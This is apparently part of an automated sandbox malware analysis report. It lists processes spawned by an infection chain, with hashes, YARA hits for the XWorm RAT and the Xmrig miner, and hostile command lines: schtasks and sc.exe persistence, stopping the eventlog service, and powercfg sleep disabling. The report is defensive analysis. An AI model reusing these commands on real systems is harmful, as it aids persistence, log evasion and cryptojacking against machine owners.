                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:14
                                                                                                                                            Start time:17:44:18
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT
                                                                                                                                            Imagebase:0x7ff71e800000
                                                                                                                                            File size:1'714'462 bytes
                                                                                                                                            MD5 hash:68D36FA633B4FB19D5C5B285C9A0B415
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:15
                                                                                                                                            Start time:17:44:18
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp" /SL5="$20532,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:1'181'184 bytes
                                                                                                                                            MD5 hash:BCC236A3921E1388596A42B05686FF5E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:16
                                                                                                                                            Start time:17:44:19
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv"
                                                                                                                                            Imagebase:0xbc0000
                                                                                                                                            File size:20'992 bytes
                                                                                                                                            MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:17
                                                                                                                                            Start time:17:44:19
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv"
                                                                                                                                            Imagebase:0x7ff642490000
                                                                                                                                            File size:25'088 bytes
                                                                                                                                            MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:18
                                                                                                                                            Start time:17:44:19
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }"
                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                            File size:452'608 bytes
                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:19
                                                                                                                                            Start time:17:44:19
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:20
                                                                                                                                            Start time:17:44:23
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe"
                                                                                                                                            Imagebase:0x720000
                                                                                                                                            File size:482'304 bytes
                                                                                                                                            MD5 hash:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000000.2457478435.0000000000722000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, Author: Joe Security
                                                                                                                                            • Rule: rat_win_xworm_v2, Description: Finds XWorm v2 samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, Author: Sekoia.io
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 53%, ReversingLabs
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:21
                                                                                                                                            Start time:17:44:23
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe"
                                                                                                                                            Imagebase:0x340000
                                                                                                                                            File size:560'640 bytes
                                                                                                                                            MD5 hash:75C2C9D60104BA3C4271B2A629E90023
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.2849008746.0000000000DE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.2873162954.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000015.00000002.2971352807.00000000130D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:22
                                                                                                                                            Start time:17:44:23
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\pcqxl.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\pcqxl.exe
                                                                                                                                            Imagebase:0x7ff6db010000
                                                                                                                                            File size:2'625'536 bytes
                                                                                                                                            MD5 hash:382DC2CC6405B237FA73B03EF0B52327
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:23
                                                                                                                                            Start time:17:44:25
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:24
                                                                                                                                            Start time:17:44:24
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
                                                                                                                                            Imagebase:0x7ff76f990000
                                                                                                                                            File size:235'008 bytes
                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:25
                                                                                                                                            Start time:17:44:24
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:26
                                                                                                                                            Start time:17:44:25
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:27
                                                                                                                                            Start time:17:44:25
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:28
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:29
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:30
                                                                                                                                            Start time:17:44:25
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\NzL6O1Q.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\NzL6O1Q.exe
                                                                                                                                            Imagebase:0xd80000
                                                                                                                                            File size:482'304 bytes
                                                                                                                                            MD5 hash:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:31
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:32
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:33
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:34
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe delete "RNRFMTFS"
                                                                                                                                            Imagebase:0x7ff6efea0000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:35
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0xb0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:37
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe create "RNRFMTFS" binpath= "C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe" start= "auto"
                                                                                                                                            Imagebase:0x7ff6efea0000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:38
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:39
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                            Imagebase:0x7ff6efea0000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:40
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\sc.exe start "RNRFMTFS"
                                                                                                                                            Imagebase:0x7ff6efea0000
                                                                                                                                            File size:72'192 bytes
                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:41
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:42
                                                                                                                                            Start time:17:44:26
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:43
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe
                                                                                                                                            Imagebase:0x7ff7ae5c0000
                                                                                                                                            File size:2'625'536 bytes
                                                                                                                                            MD5 hash:382DC2CC6405B237FA73B03EF0B52327
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 78%, ReversingLabs
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:44
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:45
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:46
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:47
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:48
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:49
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\powercfg.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                            Imagebase:0x7ff7376b0000
                                                                                                                                            File size:96'256 bytes
                                                                                                                                            MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:50
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:51
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:52
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:53
                                                                                                                                            Start time:17:44:27
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:svchost.exe
                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                            File size:55'320 bytes
                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000035.00000002.3294103754.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:54
                                                                                                                                            Start time:17:44:36
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\NzL6O1Q.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
                                                                                                                                            Imagebase:0x9e0000
                                                                                                                                            File size:482'304 bytes
                                                                                                                                            MD5 hash:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:55
                                                                                                                                            Start time:17:44:47
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe"
                                                                                                                                            Imagebase:0x7ff6f0600000
                                                                                                                                            File size:24'997'182 bytes
                                                                                                                                            MD5 hash:9D60674507EA97985C7E3B08D610F8D7
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 13%, ReversingLabs
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:56
                                                                                                                                            Start time:17:44:47
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\NzL6O1Q.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
                                                                                                                                            Imagebase:0x910000
                                                                                                                                            File size:482'304 bytes
                                                                                                                                            MD5 hash:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:true


                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:3.6%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:3.7%
